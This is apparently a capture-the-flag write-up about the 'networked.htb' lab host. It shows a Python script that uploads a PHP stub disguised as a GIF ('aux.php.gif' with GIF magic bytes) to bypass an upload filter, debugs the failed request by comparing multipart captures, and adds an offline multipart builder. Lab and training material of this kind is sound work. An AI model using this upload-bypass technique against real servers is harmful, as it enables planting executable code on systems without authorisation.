import requests

# Target taken from the form action and the Host header shown below.
url = "http://networked.htb/upload.php"

def upload_fileEx(filename: str) -> None:
    # files = { "myFile": (filename, open(EXPLOIT, "rb"), "image/png") }
    # The second entry has filename None, so requests sends it as a plain form
    # field: it is what the form's submit button contributes.
    files = [("myFile", (filename, r"GIF87a<?php echo(1); ?>", "image/gif")), ("submit", (None, "go!"))]
    proxy = { "http": "http://127.0.0.1:8080" }  # route through a local intercepting proxy to inspect the request
    r = requests.post(url, files=files, proxies=proxy)
    print(r.text)

if __name__ == '__main__':
    upload_fileEx("aux.php.gif")
The target is just a very simple upload form:
<form action="/upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="myFile">
<br>
<input type="submit" name="submit" value="go!">
</form>
This was the initial code, and the upload failed:
files = { "myFile": (filename, r"GIF87a<?php echo(1); ?>", "image/gif") }
r = requests.post(url, files=files, proxies=proxy)
The request it produced (headers and body):
POST /upload.php HTTP/1.1
Host: networked.htb
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 197
Content-Type: multipart/form-data; boundary=acba2ede0fd10bf0502358f99d6d20f3
--acba2ede0fd10bf0502358f99d6d20f3
Content-Disposition: form-data; name="myFile"; filename="aux.php.gif"
Content-Type: image/gif
GIF87a<?php echo(1); ?>
--acba2ede0fd10bf0502358f99d6d20f3--
Compare it with the request of a successful upload:
POST /upload.php HTTP/1.1
Host: networked.htb
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 287
Content-Type: multipart/form-data; boundary=20c3527f70dbcd8883630232a349fc35
--20c3527f70dbcd8883630232a349fc35
Content-Disposition: form-data; name="myFile"; filename="aux.php.gif"
Content-Type: image/gif
GIF87a<?php echo(1); ?>
--20c3527f70dbcd8883630232a349fc35
Content-Disposition: form-data; name="submit"
go!
--20c3527f70dbcd8883630232a349fc35--
The difference is that the successful request carries one more form field:
Content-Disposition: form-data; name="submit"
go!
--20c3527f70dbcd8883630232a349fc35--
So two parts have to be submitted: the file itself, and a plain key-value pair for the submit button. In requests, a `files=` entry whose filename is `None` is emitted as an ordinary field, with no `filename` parameter and no `Content-Type` line, which is exactly what the browser sends for the button:
files = [
("myFile", (filename, r"GIF87a<?php echo(1); ?>", "image/gif")),
("submit", (None, "go!"))
]
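To make the difference between the two `files=` shapes visible without a target host, the following is an added example (not code from the original post) that builds a multipart/form-data body the way python-requests does and parses it back. It uses only the standard library. The field names `myFile` and `submit`, the filename `aux.php.gif`, the payload and the two boundary strings are copied from the requests shown above, and the encoder reproduces their Content-Length values of 197 and 287; the server-side gate in `server_accepts()` is an assumption modelled on the observed success and failure, since the PHP source is not on the page.

```python
"""Build a multipart/form-data body in the shape python-requests emits, then
parse it back, to show why the dict form sends only the file part while the
list form also sends the "submit" field.  Added example, standard library
only; nothing is sent to networked.htb.
"""
import secrets
from typing import Dict, List, Optional, Sequence, Tuple

# Sample inputs copied from the requests shown in the post.
FILENAME = "aux.php.gif"
PAYLOAD = b"GIF87a<?php echo(1); ?>"  # GIF magic bytes followed by a PHP stub
FAILED_BOUNDARY = "acba2ede0fd10bf0502358f99d6d20f3"   # the 197-byte request
SUCCESS_BOUNDARY = "20c3527f70dbcd8883630232a349fc35"  # the 287-byte request

# A part is (field_name, spec) where spec is (filename, content) or
# (filename, content, content_type): the tuple shapes requests accepts in files=.
Part = Tuple[str, Sequence]
Field = Tuple[Optional[str], Optional[str], bytes]  # (filename, content_type, data)


def build_multipart(parts: List[Part], boundary: Optional[str] = None) -> Tuple[str, bytes]:
    """Return (Content-Type header value, body bytes) for the given parts."""
    boundary = boundary or secrets.token_hex(16)
    out = bytearray()
    for name, spec in parts:
        filename, content, *rest = spec
        ctype = rest[0] if rest else None
        if isinstance(content, str):
            content = content.encode()
        out += f"--{boundary}\r\n".encode()
        disp = f'Content-Disposition: form-data; name="{name}"'
        if filename is not None:                 # filename=None -> plain field
            disp += f'; filename="{filename}"'
        out += disp.encode() + b"\r\n"
        if ctype is not None:                    # plain fields get no Content-Type line
            out += f"Content-Type: {ctype}\r\n".encode()
        out += b"\r\n" + content + b"\r\n"
    out += f"--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", bytes(out)


def parse_multipart(content_type: str, body: bytes) -> Dict[str, Field]:
    """Minimal parser: map each part's name to (filename, content_type, data)."""
    boundary = content_type.split("boundary=", 1)[1].encode()
    fields: Dict[str, Field] = {}
    for chunk in body.split(b"--" + boundary):
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        if chunk.endswith(b"\r\n"):
            chunk = chunk[:-2]
        if not chunk or chunk == b"--":          # preamble / closing delimiter
            continue
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode().split("\r\n"):
            k, _, v = line.partition(":")
            headers[k.strip().lower()] = v.strip()
        params = {}
        for item in headers["content-disposition"].split(";")[1:]:
            k, _, v = item.strip().partition("=")
            params[k] = v.strip('"')
        fields[params["name"]] = (params.get("filename"), headers.get("content-type"), data)
    return fields


def file_only(boundary: Optional[str] = None) -> Tuple[str, bytes]:
    """The dict form from the post: only the file part is emitted."""
    return build_multipart([("myFile", (FILENAME, PAYLOAD, "image/gif"))], boundary)


def file_and_submit(boundary: Optional[str] = None) -> Tuple[str, bytes]:
    """The list form: ("submit", (None, "go!")) becomes a plain field."""
    return build_multipart([
        ("myFile", (FILENAME, PAYLOAD, "image/gif")),
        ("submit", (None, "go!")),
    ], boundary)


def server_accepts(content_type: str, body: bytes) -> bool:
    """Assumed server-side gate (the PHP is not on the page): the post only
    shows the upload succeeding when a 'submit' field accompanies 'myFile',
    as a check like isset($_POST['submit']) would require."""
    fields = parse_multipart(content_type, body)
    return "myFile" in fields and "submit" in fields


if __name__ == "__main__":
    for label, (ct, body) in (("dict form", file_only(FAILED_BOUNDARY)),
                              ("list form", file_and_submit(SUCCESS_BOUNDARY))):
        print(f"{label}: Content-Length {len(body)}, fields {sorted(parse_multipart(ct, body))}, "
              f"accepted={server_accepts(ct, body)}")
```

Running it prints the 197 and 287 byte lengths from the captured requests, and shows the dict form lacking the `submit` field that the assumed gate requires. The same parser is handy when proxying a real upload: dump the captured body and confirm which field names actually reached the server before debugging the payload itself.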